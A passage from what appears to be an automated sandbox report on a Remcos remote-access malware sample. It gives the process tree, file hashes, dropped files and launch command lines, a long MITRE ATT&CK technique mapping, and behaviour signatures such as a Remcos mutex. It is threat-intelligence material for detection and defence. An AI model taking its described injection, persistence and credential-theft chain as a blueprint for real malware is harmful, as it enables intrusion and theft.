"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe", "sha256": "02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859"}, {"uid": "00000000-00004744", "parentuid": "00000000-00004836", "name": "02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe", "normalized_path": "C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe", "sha256": "02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859"}, {"uid": "00000000-00003504", "parentuid": "00000000-00004744", "name": "hab.exe", "normalized_path": "%TEMP%\\hab.exe", "sha256": "89bc0b0c1bea0ff9ea3aea5a0ad58aa7cfc50cad5c9b00200ee3dcf72d601263"}, {"uid": "00000000-00004488", "parentuid": "00000000-00003504", "name": "hab.exe", "normalized_path": "%TEMP%\\hab.exe", "sha256": "89bc0b0c1bea0ff9ea3aea5a0ad58aa7cfc50cad5c9b00200ee3dcf72d601263"}, {"uid": "00000000-00005392", "parentuid": "00000000-00004488", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%TEMP%\\install.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}, {"uid": "00000000-00005428", "parentuid": "00000000-00005392", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/c \"%APPDATA%\\remcos\\remcos.exe\"", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00005488", "parentuid": "00000000-00005428", "name": "remcos.exe", "normalized_path": "%APPDATA%\\remcos\\remcos.exe", "sha256": "89bc0b0c1bea0ff9ea3aea5a0ad58aa7cfc50cad5c9b00200ee3dcf72d601263"}, {"uid": "00000000-00005656", "parentuid": "00000000-00005488", "name": "remcos.exe", "normalized_path": "%APPDATA%\\remcos\\remcos.exe", "sha256": "89bc0b0c1bea0ff9ea3aea5a0ad58aa7cfc50cad5c9b00200ee3dcf72d601263"}, {"uid": "00000000-00005744", "parentuid": "00000000-00005656", "name": "hab.exe", "normalized_path": "%TEMP%\\hab.exe", "sha256": "6c48bbdfe62d0b75d5891eb4db027f91fae707a36f666832469e2a608882fca9"}, {"uid": "00000000-00004300", "parentuid": "00000000-00005744", "name": "hab.exe", "normalized_path": "%TEMP%\\hab.exe", "sha256": "6c48bbdfe62d0b75d5891eb4db027f91fae707a36f666832469e2a608882fca9"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 4, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Visual Basic", "attck_id": "T1059.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 3, "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 14}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 22}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 4, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 4, "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 6, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "module-0", "type": 10, "name": "Loads the visual basic runtime environment", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"hab.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000\n \"remcos.exe\" loaded module \"%WINDIR%\\System32\\msvbvm60.dll\" at 72940000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\"\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.vbs\"\n \"hab.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs\"\n \"remcos.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\hab.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Remcos-5S9O07\"\n \"Remcos-5S9O07\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\TREATAS\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\\TREATAS\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")\n \"WScript.exe\" touched \"Network\" (Path: 